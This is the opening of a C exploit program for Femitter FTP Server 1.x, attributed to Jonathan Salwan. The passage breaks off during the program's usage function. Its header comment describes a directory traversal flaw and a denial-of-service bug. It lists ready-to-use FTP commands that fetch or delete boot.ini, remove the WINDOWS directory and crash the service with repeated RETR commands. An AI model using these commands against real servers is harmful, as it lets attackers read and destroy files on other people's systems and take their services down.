/* Femitter Server FTP 1.x Multiple Vulnerability ---------------------------------------------------- Arbitrary: ---------- The vulnerability is caused due to an input validation error when processing FTP requests. This can be exploited to read, modify, or delete arbitrary files from the affected system via directory traversal attacks. Remote Crash: ------------- The vulnerability is caused due to an error in handling the RETR command. This can be exploited to crash the FTP service by sending the "RETR" command without sending the "PORT" command. -------------------------------------------------------------------------------------------------------- FTP Service: ------------ You can delet file boot.ini => DELE ../../boot.ini You can get file boot.ini => RETR ../../boot.ini You can creat Directory => MKD ../../poc You can delet Directory => RMD ../../WINDOWS You can crash service => (RETR 0)x2 Author: Jonathan Salwan Mail : submit [AT] shell-storm.org Web : http://www.shell-storm.org */ #include "stdio.h" #include "unistd.h" #include "stdlib.h" #include "sys/types.h" #include "sys/socket.h" #include "netinet/in.h" int syntax(char *file) { fprintf(stderr,"\nFemitter Server FTP 1.x Multiple Vulnerability\n"); fprintf(stderr,"-----------------------------------------------------\n"); fprintf(stderr,"=>Syntax : <%s>